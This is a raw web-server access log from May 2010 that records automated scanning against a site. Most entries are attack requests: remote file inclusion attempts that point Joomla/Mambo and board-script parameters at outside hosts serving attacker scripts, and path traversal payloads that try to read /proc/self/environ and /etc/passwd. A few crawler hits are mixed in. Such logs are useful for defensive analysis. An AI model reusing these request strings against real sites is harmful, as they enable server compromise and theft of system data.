88.191.94.188 - - [25/May/2010:10:03:55 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:10:03:55 -0500] "GET /logs/access_log.1270598400/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 363 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:10:03:55 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
87.250.255.243 - - [25/May/2010:10:08:16 -0500] "GET /costume/thmb5.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
121.88.4.141 - - [25/May/2010:10:09:16 -0500] "GET /SSI.php?sourcedir=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
121.88.4.141 - - [25/May/2010:10:09:18 -0500] "GET /logs/SSI.php?sourcedir=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
121.88.4.141 - - [25/May/2010:10:09:20 -0500] "GET /logs/access_log.1271548800/SSI.php?sourcedir=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.88.4.141 - - [25/May/2010:10:09:24 -0500] "GET /logs/SSI.php?sourcedir=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
121.88.4.141 - - [25/May/2010:10:09:24 -0500] "GET /logs/access_log.1271548800/SSI.php?sourcedir=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.88.4.141 - - [25/May/2010:10:09:24 -0500] "GET /SSI.php?sourcedir=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
94.23.18.102 - - [25/May/2010:10:10:40 -0500] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.18.102 - - [25/May/2010:10:10:40 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
211.239.161.143 - - [25/May/2010:10:11:17 -0500] "GET //init.inc.php?CPG_M_DIR=http://mxlr.interfree.it/id.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
211.239.161.143 - - [25/May/2010:10:11:17 -0500] "GET /logs//init.inc.php?CPG_M_DIR=http://mxlr.interfree.it/id.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
114.108.177.125 - - [25/May/2010:10:11:48 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=77&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
114.108.177.125 - - [25/May/2010:10:11:49 -0500] "GET /index.php?option=com_myblog&Itemid=77&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.177.125 - - [25/May/2010:10:11:50 -0500] "GET /logs/index.php?option=com_myblog&Itemid=77&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
64.71.32.22 - - [25/May/2010:10:11:56 -0500] "GET /logs/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
64.71.32.22 - - [25/May/2010:10:11:56 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
81.80.122.44 - - [25/May/2010:10:12:02 -0500] "GET /logs//main.php?pageURL=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
114.108.177.125 - - [25/May/2010:10:12:02 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=77&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.80.122.44 - - [25/May/2010:10:12:03 -0500] "GET //main.php?pageURL=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.177.125 - - [25/May/2010:10:12:03 -0500] "GET /index.php?option=com_myblog&Itemid=77&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
114.108.177.125 - - [25/May/2010:10:12:03 -0500] "GET /logs/index.php?option=com_myblog&Itemid=77&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.80.122.44 - - [25/May/2010:10:12:51 -0500] "GET /logs/access_log.1272499200//main.php?pageURL=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.80.122.44 - - [25/May/2010:10:12:51 -0500] "GET //main.php?pageURL=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.80.122.44 - - [25/May/2010:10:12:52 -0500] "GET /logs//main.php?pageURL=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.80.122.44 - - [25/May/2010:10:12:56 -0500] "GET /logs/access_log.1270684800//main.php?pageURL=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
94.23.18.102 - - [25/May/2010:10:13:20 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.18.102 - - [25/May/2010:10:13:20 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.80.122.44 - - [25/May/2010:10:13:45 -0500] "GET //main.php?pageURL=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
64.71.32.22 - - [25/May/2010:10:14:06 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
75.125.247.170 - - [25/May/2010:10:19:11 -0500] "GET /logs/*.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:12 -0500] "GET /logs/*.php?option=com_jprojectmanager&controller=../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:13 -0500] "GET /logs/*.php?option=com_jprojectmanager&controller=../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:15 -0500] "GET /logs/*.php?option=com_jprojectmanager&controller=../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:16 -0500] "GET /logs/*.php?option=com_jprojectmanager&controller=../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:17 -0500] "GET /logs/*.php?option=com_jprojectmanager&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:18 -0500] "GET /logs/*.php?option=com_jprojectmanager&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:19 -0500] "GET /logs/*.php?option=com_jprojectmanager&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:20 -0500] "GET /logs/*.php?option=com_jprojectmanager&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:21 -0500] "GET /logs/*.php?option=com_jprojectmanager&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:23 -0500] "GET /logs/*.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:24 -0500] "GET /logs/*.php?option=com_jprojectmanager&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:25 -0500] "GET /logs/*.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:25 -0500] "GET /*.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:26 -0500] "GET /*.php?option=com_jprojectmanager&controller=../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:27 -0500] "GET /*.php?option=com_jprojectmanager&controller=../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:28 -0500] "GET /*.php?option=com_jprojectmanager&controller=../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:29 -0500] "GET /*.php?option=com_jprojectmanager&controller=../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:30 -0500] "GET /*.php?option=com_jprojectmanager&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:32 -0500] "GET /*.php?option=com_jprojectmanager&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:33 -0500] "GET /*.php?option=com_jprojectmanager&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:34 -0500] "GET /*.php?option=com_jprojectmanager&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:35 -0500] "GET /*.php?option=com_jprojectmanager&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:36 -0500] "GET /*.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:37 -0500] "GET /*.php?option=com_jprojectmanager&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.814"
75.125.247.170 - - [25/May/2010:10:19:38 -0500] "GET /*.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.814"
211.239.161.143 - - [25/May/2010:10:20:50 -0500] "GET //secure_img_render.php?p=http://mxlr.interfree.it/id.jpg?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
211.239.161.143 - - [25/May/2010:10:20:51 -0500] "GET /logs//secure_img_render.php?p=http://mxlr.interfree.it/id.jpg?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
88.191.94.188 - - [25/May/2010:10:22:07 -0500] "GET /components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:10:22:07 -0500] "GET /logs/components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:10:22:07 -0500] "GET /logs/access_log.1271980800/components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 366 "-""Mozilla/5.0"
76.12.147.249 - - [25/May/2010:10:23:33 -0500] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
76.12.147.249 - - [25/May/2010:10:23:33 -0500] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.823"
76.12.147.249 - - [25/May/2010:10:23:34 -0500] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
76.12.147.249 - - [25/May/2010:10:23:34 -0500] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.823"
88.191.94.188 - - [25/May/2010:10:23:59 -0500] "GET /components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:10:23:59 -0500] "GET /logs/components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
88.191.94.188 - - [25/May/2010:10:23:59 -0500] "GET /logs/access_log.1271980800/components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 366 "-""Mozilla/5.0"
91.186.27.166 - - [25/May/2010:10:24:45 -0500] "GET /logs//index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
91.186.27.166 - - [25/May/2010:10:24:45 -0500] "GET //index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
81.80.122.44 - - [25/May/2010:10:24:48 -0500] "GET /logs/access_log.1272499200//main.php?pageURL=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.80.122.44 - - [25/May/2010:10:24:48 -0500] "GET //main.php?pageURL=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.80.122.44 - - [25/May/2010:10:24:48 -0500] "GET /logs//main.php?pageURL=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
70.38.31.166 - - [25/May/2010:10:25:31 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.810"
70.38.31.166 - - [25/May/2010:10:25:31 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
88.191.94.188 - - [25/May/2010:10:25:50 -0500] "GET /logs/access_log.1273363200/components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 366 "-""Mozilla/5.0"
58.125.181.214 - - [25/May/2010:10:26:33 -0500] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
58.125.181.214 - - [25/May/2010:10:26:33 -0500] "GET /logs/access_log.1271548800//bbs//write_comment_update.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
58.125.181.214 - - [25/May/2010:10:26:33 -0500] "GET //bbs//write_comment_update.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
89.107.213.98 - - [25/May/2010:10:27:09 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.834"
89.107.213.98 - - [25/May/2010:10:27:10 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
88.191.94.188 - - [25/May/2010:10:27:37 -0500] "GET /logs/access_log.1273363200/components/com_visualrecommend/visualrecommend.html.php?mosConfig_absolute_path=http://danny-dee.de//mambots/editors/tinymce/jscripts/tiny_mce/plugins/emotions/langs/id1.txt???? HTTP/1.1" 404 366 "-""Mozilla/5.0"
74.50.85.15 - - [25/May/2010:10:27:53 -0500] "GET //bbs//write_comment_update.php?board_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
74.50.85.15 - - [25/May/2010:10:27:53 -0500] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
74.50.85.15 - - [25/May/2010:10:27:53 -0500] "GET /logs/access_log.1271548800//bbs//write_comment_update.php?board_skin_path=http://jwchurch.dyndns.org:6113/gnuboard4//data/file/temp/head.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
58.180.42.218 - - [25/May/2010:10:28:16 -0500] "GET //skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
58.180.42.218 - - [25/May/2010:10:28:23 -0500] "GET /logs//skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
58.180.42.218 - - [25/May/2010:10:28:23 -0500] "GET /logs/access_log.1273622400%20%20//skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
81.93.240.99 - - [25/May/2010:10:28:27 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.805"
58.180.42.218 - - [25/May/2010:10:28:27 -0500] "GET //skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
81.93.240.99 - - [25/May/2010:10:28:28 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
58.180.42.218 - - [25/May/2010:10:28:32 -0500] "GET /logs/access_log.1273622400%20%20//skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
58.180.42.218 - - [25/May/2010:10:28:32 -0500] "GET /logs//skin/board/moviefl//download.php?board_skin_path=http://bellschool.net/libraries/phpmailer/id1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
122.201.90.164 - - [25/May/2010:10:28:34 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.823"
122.201.90.164 - - [25/May/2010:10:28:35 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.823"
94.23.18.102 - - [25/May/2010:10:31:02 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
58.125.181.214 - - [25/May/2010:10:31:08 -0500] "GET /logs/access_log.1271548800////bbs//////delete_comment.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
58.125.181.214 - - [25/May/2010:10:31:08 -0500] "GET ////bbs//////delete_comment.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
58.125.181.214 - - [25/May/2010:10:31:08 -0500] "GET /logs////bbs//////delete_comment.php?board_skin_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
207.46.13.86 - - [25/May/2010:10:36:01 -0500] "GET /logs/access_log.1193529600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
76.79.77.101 - - [25/May/2010:10:36:34 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.805"
76.79.77.101 - - [25/May/2010:10:36:35 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
91.186.27.166 - - [25/May/2010:10:36:54 -0500] "GET /logs//index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
91.186.27.166 - - [25/May/2010:10:36:54 -0500] "GET //index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
207.46.13.101 - - [25/May/2010:10:37:01 -0500] "GET /logs/access_log.1265328000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [25/May/2010:10:37:41 -0500] "GET /logs/access_log.1251504000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [25/May/2010:10:38:10 -0500] "GET /logs/access_log.1221782400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.186.27.166 - - [25/May/2010:10:40:37 -0500] "GET /logs//index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
91.186.27.166 - - [25/May/2010:10:40:37 -0500] "GET //index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
76.12.16.220 - - [25/May/2010:10:41:11 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.79"
76.12.16.220 - - [25/May/2010:10:41:12 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
188.165.68.4 - - [25/May/2010:10:41:17 -0500] "GET /logs/?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6908 "-""libwww-perl/5.805"
188.165.68.4 - - [25/May/2010:10:41:18 -0500] "GET /?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
207.46.204.231 - - [25/May/2010:10:41:30 -0500] "GET /logs/access_log.1258761600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
188.165.68.4 - - [25/May/2010:10:41:40 -0500] "GET /logs/*?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
188.165.68.4 - - [25/May/2010:10:41:40 -0500] "GET /*?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 285 "-""libwww-perl/5.805"
64.27.53.238 - - [25/May/2010:10:41:49 -0500] "GET //components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
64.27.53.238 - - [25/May/2010:10:41:49 -0500] "GET /logs//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
64.27.53.238 - - [25/May/2010:10:41:49 -0500] "GET /logs/access_log.1223683200%20%20//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
64.27.53.238 - - [25/May/2010:10:41:49 -0500] "GET //components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
64.27.53.238 - - [25/May/2010:10:41:49 -0500] "GET /logs/access_log.1223683200%20%20//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 353 "-""Mozilla/5.0"
64.27.53.238 - - [25/May/2010:10:41:49 -0500] "GET /logs//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
213.251.170.118 - - [25/May/2010:10:41:58 -0500] "GET //galeria.php?start=0&kategoria=http://wantedhack.hellospace.net/id.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
213.251.170.118 - - [25/May/2010:10:41:58 -0500] "GET /logs//galeria.php?start=0&kategoria=http://wantedhack.hellospace.net/id.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
213.251.170.118 - - [25/May/2010:10:41:58 -0500] "GET /logs/access_log.1271548800//galeria.php?start=0&kategoria=http://wantedhack.hellospace.net/id.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.30.142.216 - - [25/May/2010:10:42:18 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [25/May/2010:10:42:18 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
76.12.16.220 - - [25/May/2010:10:42:45 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
76.12.147.249 - - [25/May/2010:10:42:54 -0500] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
76.12.147.249 - - [25/May/2010:10:42:54 -0500] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.823"
76.12.147.249 - - [25/May/2010:10:42:55 -0500] "GET /logs/*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
76.12.147.249 - - [25/May/2010:10:42:55 -0500] "GET /*.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.823"
94.23.18.102 - - [25/May/2010:10:43:54 -0500] "GET /logs/access_log.1273363200//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.18.102 - - [25/May/2010:10:43:54 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.18.102 - - [25/May/2010:10:43:54 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
76.12.16.220 - - [25/May/2010:10:45:58 -0500] "GET /logs/access_log.1273017600/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
76.12.16.220 - - [25/May/2010:10:45:59 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
